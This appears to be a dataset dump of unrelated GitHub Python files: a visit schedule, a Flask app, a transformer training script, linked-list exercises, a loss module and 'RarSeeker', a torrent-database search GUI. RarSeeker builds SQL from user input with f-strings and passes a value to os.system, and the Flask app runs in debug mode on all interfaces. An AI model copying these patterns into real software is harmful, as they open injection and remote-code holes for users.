caregiver_crfs_unscheduled,\n requisitions_unscheduled=requisitions_unscheduled,\n crfs_prn=crfs_prn,\n requisitions_prn=requisitions_prn,\n **kwargs)\n\n\nvisit2000 = Visit(\n code='2000M',\n title='Cohort B Enrollment Visit',\n timepoint=0,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(months=3),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=bc_crf_2000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit2001 = Visit(\n code='2001M',\n title='Cohort B Quarterly Visit 1',\n timepoint=1,\n rbase=relativedelta(days=90),\n rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3000 = Visit(\n code='3000M',\n title='Cohort B Follow Up Visit',\n timepoint=14,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(days=30),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=b_crf_3000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3000sq = Visit(\n code='3000B',\n title='Cohort B SQ Follow Up Visit',\n timepoint=14,\n rbase=relativedelta(days=0),\n rlower=relativedelta(days=0),\n rupper=relativedelta(days=30),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=b_crf_3000,\n crfs_prn=caregiver_ref_crf_prn,\n facility_name='5-day clinic')\n\nvisit3001 = Visit(\n code='3001M',\n title='Cohort B Follow Up Quarterly Visit 1',\n timepoint=2,\n rbase=relativedelta(days=90),\n rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_crfs_prn,\n facility_name='5-day clinic')\n\nvisit3001sq = Visit(\n code='3001S',\n title='Cohort B Sec Follow Up Quarterly Visit 1',\n timepoint=2,\n rbase=relativedelta(days=90),\n rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_crfs_prn,\n facility_name='5-day 
clinic')\n","repo_name":"flourishbhp/flourish-visit-schedule","sub_path":"flourish_visit_schedule/visit_schedules/schedules/caregiver/caregiver_visits/cohort_b_visits.py","file_name":"cohort_b_visits.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36837795247","text":"from flask import Flask, render_template\n\nfrom presets import PresetsAPI\n\napp = Flask(__name__)\npresets_view = PresetsAPI.as_view('presets')\napp.add_url_rule('/presets/', view_func= presets_view, methods = ['GET', 'POST'])\napp.add_url_rule('/presets/', view_func = presets_view, methods=['PUT', 'DELETE'])\n\n#Flask and Ajax returns\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"MaxHunt/barProject","sub_path":"app_sam.py","file_name":"app_sam.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73368313832","text":"import gzip\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport os.path\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datasets.enwik8_dataset import Enwik8CharsDataset\n\nfrom transformer.models import AutoregressiveDecoder\n\nTRAIN_SIZE = 100000\nTEST_SIZE = 50000\nBATCH_SIZE = 20\nTRAIN_EPOCHS = 5\nLEARNING_RATE = 0.0001\nWARMUP_STEPS = 5000\nCONTEXT_LEN = 128\n\nMODEL_NAME = 'enwik8_char_large5'\n\nGEN_CHARS_AMOUNT = 1500\nTEMP = 0.0\n\ndef sample(probs, tempature=0.0):\n if tempature == 0.0:\n return probs.argmax()\n\n probs = F.softmax(probs / tempature, dim=0)\n dist = torch.distributions.Categorical(probs)\n\n return dist.sample()\n\ndef evaluate(model, dataset):\n test_dataloader = torch.utils.data.DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=Enwik8CharsDataset.collate)\n\n inputs, targets = next(iter(test_dataloader))\n\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n outputs = model(inputs)\n loss = loss_fn(outputs.transpose(2, 1), targets)\n\n return loss.item()\n\nif __name__ == '__main__':\n dataset = Enwik8CharsDataset(CONTEXT_LEN)\n train_dataset, test_dataset, _ = torch.utils.data.random_split(dataset, (10000000, 150000, len(dataset) - 10000000 - 150000))\n print(f'Train dataset size: {len(train_dataset)}, Test dataset size: {len(test_dataset)}')\n\n model = AutoregressiveDecoder(dim_embeddings=128, num_heads=12, num_layers=20, num_tokens=256, seq_length=CONTEXT_LEN)\n model.cuda()\n\n if os.path.isfile(f'models/{MODEL_NAME}.pt'):\n model.load_state_dict(torch.load(f'models/{MODEL_NAME}.pt'))\n print('Loaded model from disk')\n else:\n print('No model found, starting from scratch')\n\n board = SummaryWriter(f'runs/{MODEL_NAME}')\n\n optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE )\n optimizer.zero_grad()\n\n loss_fn = torch.nn.NLLLoss(reduction='mean')\n\n i = 0\n for _ in range(TRAIN_EPOCHS):\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=Enwik8CharsDataset.collate)\n\n for inputs, targets in train_dataloader:\n if WARMUP_STEPS > 0 and i < WARMUP_STEPS:\n lr = max((LEARNING_RATE / WARMUP_STEPS) * i, 1e-10)\n optimizer.lr = lr\n\n optimizer.zero_grad()\n\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n outputs = model(inputs)\n loss = loss_fn(outputs.transpose(2, 1), targets)\n\n board.add_scalar('loss', loss.item(), i)\n\n 
            loss.backward()\n            optimizer.step()\n\n            if i % 10 == 0:\n                print(f'Iteration: {i}, Loss: {loss.item()}')\n\n            if i % 100 == 0:\n                validation_loss = evaluate(model, test_dataset)\n                board.add_scalar('validation_loss', validation_loss, i)\n                print(f'Iteration: {i}, Validation loss: {validation_loss}')\n\n                torch.save(model.state_dict(), f'models/{MODEL_NAME}.pt')\n\n            i += 1\n\n    # model.eval()\n    # input_seq = test_data[:CONTEXT_LEN - 15].long().cuda()\n\n    # for char in input_seq:\n    #     print(str(chr(char)), end='')\n\n    # for _ in range(GEN_CHARS_AMOUNT):\n    #     probs = model(input_seq[None, :])\n    #     next_char = sample(probs[0, -1, :], TEMP)\n\n    #     print(str(chr(max(32, next_char))), end='')\n\n    #     input_seq = torch.cat([input_seq[1:], next_char[None]], dim=0)\n","repo_name":"jacobvm04/nlp-transformers","sub_path":"enwik8_chars.py","file_name":"enwik8_chars.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16871716881","text":"import sys\nfrom game import Game\n\n\ndef main():\n    try:\n        size = int(sys.argv[1]), int(sys.argv[2])\n        prob = float(sys.argv[3])\n        g = Game(size, prob)\n    except (IndexError, ValueError):\n        print('Type instead: \\" python shola.py 10 10 0.2 \\"')\n        exit()\n    g.run()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"or-yanko/Python-Projects","sub_path":"pyGame/sholeHamokshim/shola.py","file_name":"shola.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71433723434","text":"import tkinter as tk\r\nfrom tkinter import ttk, filedialog, messagebox\r\nimport sqlite3\r\nimport os\r\nimport re\r\nimport configparser\r\n\r\n\r\nclass RarSeekerApp:\r\n    def __init__(self, root):\r\n        self.root = root\r\n        self.root.title(\"RarSeeker\")\r\n        self.root.grid_rowconfigure(1, weight=1)\r\n        self.root.grid_columnconfigure(0, weight=1)\r\n\r\n        # Load the database path from the configuration file\r\n        self.config = configparser.ConfigParser()\r\n        self.config_file = \"rarseeker_config.ini\"\r\n        self.db_path = None\r\n\r\n        if os.path.isfile(self.config_file):\r\n            self.config.read(self.config_file)\r\n            if \"Settings\" in self.config:\r\n                self.db_path = self.config[\"Settings\"].get(\"db_path\", None)\r\n\r\n        # Search fields on the left-hand side\r\n        search_frame = ttk.Frame(root)\r\n        search_frame.grid(row=0, column=0, padx=5, pady=5, sticky=\"w\")\r\n\r\n        # Add the dropdown for selecting the search field\r\n        self.search_field_label = ttk.Label(search_frame, text=\"Search by:\")\r\n        self.search_field_label.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n        self.search_field_var = tk.StringVar()\r\n        self.search_field_var.set(\"name\")  # Initially set to \"name\"\r\n\r\n        self.name_search_radio = ttk.Radiobutton(search_frame, text=\"Name\", variable=self.search_field_var, value=\"name\")\r\n        self.imdb_search_radio = ttk.Radiobutton(search_frame, text=\"IMDB Tag\", variable=self.search_field_var, value=\"imdb tag\")\r\n\r\n        self.name_search_radio.grid(row=0, column=1, padx=5, pady=5)\r\n        self.imdb_search_radio.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n        #self.name_label = ttk.Label(search_frame, text=\"Name:\")\r\n        self.name_field = ttk.Entry(search_frame, width=40)\r\n        self.name_field.bind('<Return>', lambda event=None: self.search_db())\r\n        self.search_button = ttk.Button(search_frame, text=\"Search\", command=self.search_db)\r\n\r\n
        #self.name_label.grid(row=0, column=2, padx=5, pady=5)\r\n        self.name_field.grid(row=0, column=3, padx=5, pady=5)\r\n        self.search_button.grid(row=0, column=4, padx=5, pady=5)\r\n\r\n\r\n\r\n        self.category_label = ttk.Label(search_frame, text=\"Category:\")\r\n        self.category_label.grid(row=0, column=5, padx=5, pady=5)\r\n\r\n        self.category_combo = ttk.Combobox(search_frame, values=[\"All\", \"ebooks\", \"games_pc_iso\", \"games_pc_rip\", \"games_ps3\", \"games_ps4\", \"games_xbox360\", \"movies\", \"movies_bd_full\", \"movies_bd_remux\", \"movies_x264\", \"movies_x264_3d\", \"movies_x264_4k\", \"movies_x264_720\", \"movies_x265\", \"movies_x265_4k\", \"movies_x265_4k_hdr\", \"movies_xvid\", \"movies_xvid_720\", \"music_flac\", \"music_mp3\", \"software_pc_iso\", \"tv\", \"tv_sd\", \"tv_uhd\", \"xxx\"])\r\n        self.category_combo.set(\"All\")\r\n        self.category_combo.grid(row=0, column=6, padx=5, pady=5)\r\n        self.column_widths = [220, 560, 50, 55, 2, 3, 4]\r\n        # Results display area\r\n        self.treeview = ttk.Treeview(root, columns=(\"Hash\", \"Title\", \"DT\", \"Category\", \"Size\", \"Resolution\", \"IMDB Tag\"), show=\"headings\")\r\n        # self.treeview.heading(\"ID\", text=\"ID\")\r\n        self.treeview.heading(\"Hash\", text=\"Hash\", command=lambda: self.treeview_sort_column(\"Hash\", False))\r\n        self.treeview.heading(\"Title\", text=\"Title\", command=lambda: self.treeview_sort_column(\"Title\", False))\r\n        self.treeview.heading(\"DT\", text=\"Date\", command=lambda: self.treeview_sort_column(\"DT\", False))\r\n        self.treeview.heading(\"Category\", text=\"Category\", command=lambda: self.treeview_sort_column(\"Category\", False))\r\n        self.treeview.heading(\"Size\", text=\"Size\", command=lambda: self.treeview_sort_size())\r\n        self.treeview.heading(\"Resolution\", text=\"Resolution\", command=lambda: self.treeview_sort_resolution())\r\n        self.treeview.heading(\"IMDB Tag\", text=\"IMDB Tag\", command=lambda: self.treeview_sort_column(\"IMDB Tag\", False))\r\n        self.treeview.grid(row=1, column=0, columnspan=5, padx=5, pady=5, sticky=\"nsew\")\r\n\r\n        self.treeview.bind(\"<Double-1>\", lambda event: None)\r\n        self.treeview.bind(\"<Button-3>\", self.show_context_menu)\r\n\r\n        self.scrollbar = ttk.Scrollbar(root, orient=\"vertical\", command=self.treeview.yview)\r\n        self.scrollbar.grid(row=1, column=5, padx=5, pady=5, sticky=\"ns\")\r\n        self.treeview.configure(yscrollcommand=self.scrollbar.set)\r\n        for i, col in enumerate(self.treeview[\"columns\"]):\r\n            self.treeview.column(col, width=self.column_widths[i])\r\n        self.search_count_label = ttk.Label(root, text=\"Records Found: 0\")\r\n        self.search_count_label.grid(row=2, column=0, padx=5, pady=5, sticky=\"w\")\r\n\r\n        # Database connect & load button\r\n        button_frame = ttk.Frame(root)\r\n        button_frame.grid(row=2, column=0, columnspan=5, padx=5, pady=5)\r\n\r\n        self.connect_load_button = ttk.Button(button_frame, text=\"Connect & Load DB\", command=self.connect_and_load_db)\r\n        self.connect_load_button.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n        self.resolution_filter_label = ttk.Label(button_frame, text=\"Resolution Filter:\")\r\n        self.resolution_filter_label.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n        self.resolution_combo = ttk.Combobox(button_frame, values=[\"All\"])\r\n        self.resolution_combo.set(\"All\")\r\n        self.resolution_combo.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n        self.sort_column = None\r\n        self.sort_descending = False\r\n        # Disable the search fields until the database is connected\r\n
        self.resolution_combo.config(state=\"disabled\")\r\n        self.name_field.config(state=\"disabled\")\r\n        self.category_combo.config(state=\"disabled\")\r\n        self.search_button.config(state=\"disabled\")\r\n        self.name_search_radio.config(state=\"disabled\")\r\n        self.imdb_search_radio.config(state=\"disabled\")\r\n        self.resolution_combo.bind(\"<<ComboboxSelected>>\", self.update_resolution_filter)\r\n\r\n        self.db_file = None\r\n        self.db_connection = None\r\n        self.current_db = None\r\n\r\n    def save_config(self):\r\n        if self.db_path:\r\n            if not os.path.isfile(self.config_file):\r\n                open(self.config_file, 'w').close()  # Create the configuration file if it does not exist\r\n\r\n            self.config[\"Settings\"] = {\"db_path\": self.db_path}\r\n            with open(self.config_file, 'w') as configfile:\r\n                self.config.write(configfile)\r\n\r\n    def connect_and_load_db(self):\r\n        if self.db_path and not os.path.exists(self.db_path):\r\n            self.db_path = None  # Reset the database path to None so the user can select a new one\r\n            self.save_config()\r\n\r\n        if not self.db_path:\r\n            db_path = filedialog.askopenfilename(filetypes=[(\"SQLite Database\", \"*.sqlite\")])\r\n            if db_path:\r\n                self.db_path = db_path\r\n                self.save_config()\r\n            else:\r\n                return\r\n\r\n        if not os.path.exists(self.db_path):\r\n            messagebox.showerror(\"Error\", \"Database not found at the specified path.\")\r\n            return\r\n\r\n        self.db_connection = sqlite3.connect(self.db_path)\r\n        # Enable the fields once the database is connected\r\n        self.name_field.config(state=\"normal\")\r\n        self.category_combo.config(state=\"normal\")\r\n        self.search_button.config(state=\"normal\")\r\n        self.name_search_radio.config(state=\"normal\")\r\n        self.imdb_search_radio.config(state=\"normal\")\r\n        self.resolution_combo[\"state\"] = \"readonly\"  # Set to \"readonly\"\r\n        self.category_combo[\"state\"] = \"readonly\"  # Set to \"readonly\"\r\n        self.current_db = self.db_path\r\n        self.connect_load_button.config(state=\"disabled\")\r\n\r\n    def load_db(self):\r\n        if not self.current_db:\r\n            return\r\n        search_input = self.name_field.get()\r\n        selected_category = self.category_combo.get()\r\n        search_field = self.search_field_var.get()\r\n\r\n        # Split the user input into individual words\r\n        search_words = search_input.split()\r\n\r\n        # Join the words with '%' to build a single \"LIKE\" pattern\r\n        search_query = '%' + '%'.join(search_words) + '%'\r\n\r\n        # Build the SQL query\r\n        if search_field == \"name\":  # Check which search field is selected\r\n            query = f\"SELECT * FROM items WHERE title LIKE '{search_query}'\"\r\n        elif search_field == \"imdb tag\":\r\n            query = f\"SELECT * FROM items WHERE imdb = '{search_input}'\"\r\n\r\n        if selected_category != \"All\":\r\n            query += f\" AND cat = '{selected_category}'\"\r\n\r\n        cursor = self.db_connection.cursor()\r\n        cursor.execute(query)\r\n        rows = cursor.fetchall()  # Fetch all results, with no limit\r\n\r\n        self.treeview.delete(*self.treeview.get_children())\r\n\r\n        for row in rows:\r\n            id, hash, title, dt, cat, size, ext_id, imdb = row\r\n            resolution = self.extract_resolution(title)\r\n            size_str = self.format_size(size)\r\n            imdb = \"\" if imdb is None else imdb\r\n            self.treeview.insert(\"\", \"end\", values=(hash, title, dt, cat, size_str, resolution, imdb))\r\n\r\n        distinct_resolutions = self.get_distinct_resolutions(rows)\r\n        self.resolution_combo[\"values\"] = [\"All\"] + distinct_resolutions\r\n\r\n        # Update the count and display it\r\n        self.search_count = len(rows)\r\n
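        # Editor's note (hedged sketch, not original code): the queries above interpolate\r\n        # user input straight into SQL, which is injection-prone; sqlite3 also accepts\r\n        # parameterized queries, e.g.\r\n        #   cursor.execute(\"SELECT * FROM items WHERE title LIKE ?\", (search_query,))\r\n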
        self.update_search_count_label()\r\n\r\n    def treeview_sort_column(self, col, descending):\r\n        data = [(self.treeview.set(child, col), child) for child in self.treeview.get_children('')]\r\n        data.sort(reverse=descending)\r\n        for i, item in enumerate(data):\r\n            self.treeview.move(item[1], '', i)\r\n        self.treeview.heading(col, command=lambda: self.treeview_sort_column(col, not descending))\r\n\r\n    def treeview_sort_resolution(self):\r\n        items = [(self.treeview.set(child, \"Resolution\"), child) for child in self.treeview.get_children('')]\r\n        items.sort(key=lambda x: int(re.search(r'\\d+', x[0]).group()) if re.search(r'\\d+', x[0]) else 0, reverse=self.sort_descending)\r\n        for i, (val, child) in enumerate(items):\r\n            self.treeview.move(child, '', i)\r\n        self.sort_descending = not self.sort_descending\r\n\r\n    def treeview_sort_size(self):\r\n        items = [(self.treeview.set(child, \"Size\"), child) for child in self.treeview.get_children('')]\r\n        sizes = {\"KB\": 1024, \"MB\": 1024 ** 2, \"GB\": 1024 ** 3, \"TB\": 1024 ** 4, \"PB\": 1024 ** 5, \"EB\": 1024 ** 6}\r\n\r\n        # Avoid trying to convert 'N/A' to float\r\n        def get_size_key(x):\r\n            size_str = x[0]\r\n            size_parts = size_str.split()\r\n            if len(size_parts) == 2:\r\n                size_value, size_unit = size_parts\r\n                return float(size_value) * sizes.get(size_unit, -1)\r\n            else:\r\n                return -1  # Return -1 for 'N/A' or invalid sizes\r\n\r\n        items.sort(key=get_size_key, reverse=self.sort_descending)\r\n\r\n        for i, (val, child) in enumerate(items):\r\n            self.treeview.move(child, '', i)\r\n        self.sort_descending = not self.sort_descending\r\n\r\n    def update_search_count_label(self):\r\n        self.search_count_label.config(text=f\"Records Found: {self.search_count}\")\r\n\r\n    def resize_columns(self):\r\n        # Resize the columns according to the Treeview's current widths\r\n        for i, col in enumerate(self.treeview[\"columns\"]):\r\n            self.column_widths[i] = self.treeview.column(col, option=\"width\")\r\n\r\n    def show_context_menu(self, event):\r\n        item = self.treeview.identify(\"item\", event.x, event.y)\r\n        if item:\r\n            self.treeview.selection_set(item)  # Select the right-clicked item\r\n            menu = tk.Menu(self.root, tearoff=0)\r\n            menu.add_command(label=\"Copy HASH\", command=lambda: self.copy_hash(item))\r\n            menu.add_command(label=\"Copy Name\", command=lambda: self.copy_name(item))\r\n            menu.add_command(label=\"Copy IMDB Tag\", command=lambda: self.copy_imdb_tag(item))\r\n            menu.add_command(label=\"Copy Magnet Link\", command=lambda: self.copy_magnet_link(item))\r\n            menu.add_command(label=\"Open in QBitTorrent\", command=lambda: self.open_in_qbittorrent(item))\r\n            menu.post(event.x_root, event.y_root)\r\n\r\n    def copy_imdb_tag(self, item):\r\n        content = self.treeview.item(item, \"values\")[6]  # Get the value of the \"IMDB Tag\" column\r\n        self.root.clipboard_clear()\r\n        self.root.clipboard_append(content)\r\n        self.root.update()\r\n\r\n    def copy_hash(self, item):\r\n        content = self.treeview.item(item, \"values\")[0]  # Get the value of the Hash column\r\n        self.root.clipboard_clear()\r\n        self.root.clipboard_append(content)\r\n        self.root.update()  # This is necessary for it to work on some systems\r\n\r\n    def copy_name(self, item):\r\n        content = self.treeview.item(item, \"values\")[1]  # Get the value of the Title column\r\n        self.root.clipboard_clear()\r\n        self.root.clipboard_append(content)\r\n        self.root.update()\r\n\r\n    def copy_magnet_link(self, item):\r\n        torrent_hash = self.treeview.item(item, \"values\")[0]  # Get the value of the Hash column\r\n
        if torrent_hash:\r\n            magnet_link = f\"magnet:?xt=urn:btih:{torrent_hash}\"\r\n            self.root.clipboard_clear()\r\n            self.root.clipboard_append(magnet_link)\r\n            self.root.update()\r\n\r\n    def format_size(self, size):\r\n        if size is None:\r\n            return \"N/A\"\r\n        if size < 1024:\r\n            return f\"{int(size)} bytes\"  # Drop the decimal places\r\n        elif size < 1024 ** 2:\r\n            return f\"{int(size / 1024)} KB\"  # Drop the decimal places\r\n        elif size < 1024 ** 3:\r\n            return f\"{int(size / (1024 ** 2))} MB\"  # Drop the decimal places\r\n        elif size < 1024 ** 4:\r\n            return f\"{size / (1024 ** 3):.2f} GB\"\r\n        elif size < 1024 ** 5:\r\n            return f\"{size / (1024 ** 4):.2f} TB\"\r\n        else:\r\n            return \"Too big\"\r\n\r\n    def extract_resolution(self, title):\r\n        resolution_pattern = re.compile(r\"(\\d{3,4}p)\")\r\n        match = resolution_pattern.search(title)\r\n        if match:\r\n            return match.group(0)\r\n        return \"\"\r\n\r\n    def get_distinct_resolutions(self, rows):\r\n        resolutions = set()\r\n        for row in rows:\r\n            title = row[2]\r\n            resolution = self.extract_resolution(title)\r\n            if resolution:\r\n                resolutions.add(resolution)\r\n\r\n        # Extract and sort by the numeric part of the resolution only\r\n        resolutions = sorted(list(resolutions), key=lambda x: int(re.search(r'\\d+', x).group()) if re.search(r'\\d+', x) else 0, reverse=True)\r\n\r\n        return resolutions\r\n\r\n    def search_db(self):\r\n        if self.db_connection:\r\n            # Make sure the user typed something before running the search\r\n            search_input = self.name_field.get().strip()\r\n            if not search_input:\r\n                messagebox.showinfo(\"Empty Search\", \"Please enter a search query.\")\r\n                return\r\n\r\n            self.load_db()\r\n            self.update_search_count_label()\r\n\r\n            # Check whether no results were found\r\n            if self.search_count == 0:\r\n                messagebox.showinfo(\"No Results\", \"No results found for the given search criteria.\")\r\n\r\n            # Reset the resolution filter to \"All\" after each search\r\n            self.resolution_combo.set(\"All\")\r\n        else:\r\n            messagebox.showerror(\"Error\", \"Database not connected.\")\r\n\r\n    def open_in_qbittorrent(self, event):\r\n        selected_item = self.treeview.selection()\r\n        if selected_item:\r\n            torrent_hash = self.treeview.item(selected_item, \"values\")[0]  # Get the value of the Hash column\r\n            if torrent_hash:\r\n                qbittorrent_path = \"C:/Program Files/qBittorrent/qbittorrent.exe\"\r\n                os.system(f'\"{qbittorrent_path}\" {torrent_hash}')\r\n\r\n    def update_resolution_filter(self, event=None):\r\n        selected_resolution = self.resolution_combo.get()\r\n        search_input = self.name_field.get()\r\n        search_field = self.search_field_var.get()\r\n        search_words = search_input.split()\r\n        selected_category = self.category_combo.get()\r\n\r\n        if selected_resolution == \"All\":\r\n            # Leave the resolution filter clause empty to load all results\r\n            resolution_query = \"\"\r\n        else:\r\n            resolution_query = f\"AND title LIKE '%{selected_resolution}%'\"\r\n\r\n        if selected_category != \"All\":\r\n            cat_query = f\" AND cat = '{selected_category}'\"\r\n        else:\r\n            cat_query = \"\"\r\n\r\n        # Build the SQL query based on the resolution filter clause\r\n        if search_field == \"name\":\r\n            search_query = '%' + '%'.join(search_words) + '%'  # Build the \"LIKE\" pattern for the name\r\n            query = f\"SELECT * FROM items WHERE title LIKE '{search_query}' {resolution_query} {cat_query}\"\r\n        elif search_field == \"imdb tag\":\r\n            query = f\"SELECT * FROM items WHERE imdb = '{search_input}' {resolution_query} {cat_query}\"\r\n\r\n
        if self.db_connection:\r\n            cursor = self.db_connection.cursor()\r\n            cursor.execute(query)\r\n            rows = cursor.fetchall()\r\n\r\n            self.treeview.delete(*self.treeview.get_children())\r\n\r\n            for row in rows:\r\n                id, hash, title, dt, cat, size, ext_id, imdb = row\r\n                resolution = self.extract_resolution(title)\r\n                size_str = self.format_size(size)\r\n                imdb = \"\" if imdb is None else imdb\r\n                self.treeview.insert(\"\", \"end\", values=(hash, title, dt, cat, size_str, resolution, imdb))\r\n\r\n            # Update the count and display it\r\n            self.search_count = len(rows)\r\n            self.update_search_count_label()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    root = tk.Tk()\r\n    root.state('zoomed')\r\n    app = RarSeekerApp(root)\r\n    root.mainloop()\r\n","repo_name":"mop4r/RarSeeker","sub_path":"RarSeeker.py","file_name":"RarSeeker.py","file_ext":"py","file_size_in_byte":18860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8810160694","text":"'''\n● Problem: print the number of divisors of every number from 1 to K.\n\n1) For each number up to K, try dividing it by everything from 1 to i\nO(K^2)\n: trial division by every number <= K\n\n\n2) For each number up to K, use its divisor pairs\nO(sqrt(K) * K)\n: use the divisors. Once you have checked up to the middle divisor of K, the rest need not be checked.\n-> When the numbers get large, checking every value can be slow.\n\n\n3) Sieve of Eratosthenes\n: apply the algorithm over the range up to K; marking the multiples of each i (2<=i<=K) costs\nO(NloglogN)\n-> an array has to be allocated, so there is a memory risk.\nUsually N is given within 1_000_000\n-> in theory the problem can be solved in about 4 million operations.\n\n'''\n\n# Problem: how many primes are there up to 1000?\n\nimport math\n\nn = 1000\narray = [True] * (n+1)  # 0~1000\n\n# Sieve of Eratosthenes algorithm\narray[1] = False  # 1 is not prime\nfor i in range(2, int(math.sqrt(n)) + 1):  # from 2 up to the middle divisor of n\n    if array[i] == True:  # i has survived so far (i.e., i is prime)\n        j = 2\n        while i*j <= n:\n            array[i*j] = False\n            j += 1\n\n# Print all the primes\nfor i in range(2, n+1):\n    if array[i]:\n        print(i, end=' ')\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]이것이코딩테스트다/9_기타알고리즘/1_여러수의 소수판별.py","file_name":"1_여러수의 소수판별.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73446469034","text":"# # Singly-linked lists are already defined with this interface:\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.value = x\n#         self.next = None\n#         self.head = None\n\n\n# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n    def __init__(self, x):\n        self.value = x\n        self.next = None\n        self.head = None\n\n    def printList(self):\n        temp = self.head\n        snapit = []\n        c = 0\n        while (temp):\n            # print(temp.value)\n            snapit.append(temp.value)\n            temp = temp.next\n            c = c + 1\n        return snapit\n\n# Node class\nclass Node:\n\n    # Function to initialise the node object\n    def __init__(self, data):\n        self.data = data  # Assign data\n        self.next = None  # Initialize next as null\n\n\n# Linked List class contains a Node object\nclass LinkedList:\n\n    # Function to initialize head\n    def __init__(self):\n        self.head = None\n\n\n    # Function to insert a new node at the beginning\n    def push(self, new_data):\n\n        # 1 & 2: Allocate the Node &\n        #        Put in the data\n        new_node = Node(new_data)\n\n        # 3. Make next of new Node as head\n        new_node.next = self.head\n\n        # 4. Move the head to point to new Node\n        self.head = new_node\n\n\n    # This function is in LinkedList class. Inserts a\n    # new node after the given prev_node. This method is\n    # defined inside LinkedList class shown above\n
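    # (Editor's illustrative usage, not original code: given llist = LinkedList();\n    #  llist.push(3); llist.push(1), calling llist.insertAfter(llist.head, 2)\n    #  turns the list 1 -> 3 into 1 -> 2 -> 3.)\n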
    def insertAfter(self, prev_node, new_data):\n\n        # 1. check if the given prev_node exists\n        if prev_node is None:\n            print(\"The given previous node must be in LinkedList.\")\n            return\n\n        # 2. create new node &\n        #    put in the data\n        new_node = Node(new_data)\n\n        # 3. make next of new Node as next of prev_node\n        new_node.next = prev_node.next\n\n        # 4. make next of prev_node as new_node\n        prev_node.next = new_node\n\n\n    # This function is defined in Linked List class\n    # Appends a new node at the end. This method is\n    # defined inside LinkedList class shown above\n    def append(self, new_data):\n\n        # 1. Create a new node\n        # 2. Put in the data\n        # 3. Set next as None\n        new_node = Node(new_data)\n\n        # 4. If the Linked List is empty, then make the\n        #    new node as head\n        if self.head is None:\n            self.head = new_node\n            return\n\n        # 5. Else traverse till the last node\n        last = self.head\n        while (last.next):\n            last = last.next\n\n        # 6. Change the next of last node\n        last.next = new_node\n\n\n    # Utility function to print the linked list\n    def printList(self):\n        temp = self.head\n        snapit = []\n        c = 0\n        while (temp):\n            print(temp.data)\n            snapit.append(temp.data)\n            temp = temp.next\n            c = c + 1\n        return snapit\n\ndef reverseLinkedList(l):\n    # walk the list once to collect the values, then return them reversed\n    ll = ListNode(l)\n    ll.head = l\n    values = ll.printList()\n    return values[::-1]\n","repo_name":"extrude575757/Python_Datastructures","sub_path":"sprintLnkNdQueStackRecursion.py","file_name":"sprintLnkNdQueStackRecursion.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71717122794","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.modules.loss import _WeightedLoss\nimport torch.nn.functional as F\n\nclass MyLoss1(nn.CrossEntropyLoss):\n    def __init__(self, weights=None):\n        super(MyLoss1, self).__init__()\n        self.celoss = torch.nn.CrossEntropyLoss(weight=weights)\n    def forward(self, output, label):\n        label = label.long()\n        return self.celoss(output, label)\n\n\n\nclass LabelSmoothCrossEntropyLoss(_WeightedLoss):\n    def __init__(self, weight=None, reduction='mean', smoothing=0.15):\n        super().__init__(weight=weight, reduction=reduction)\n        self.smoothing = smoothing\n        self.weight = weight\n        self.reduction = reduction\n    @staticmethod\n    def _smooth_one_hot(targets: torch.Tensor, n_classes: int, smoothing=0.0):\n        assert 0 <= smoothing < 1\n        with torch.no_grad():\n            targets = torch.empty(size=(targets.size(0), n_classes),\n                                  device=targets.device) \\\n                .fill_(smoothing / (n_classes - 1)) \\\n                .scatter_(1, targets.data.unsqueeze(1), 1. - smoothing)\n        return targets\n
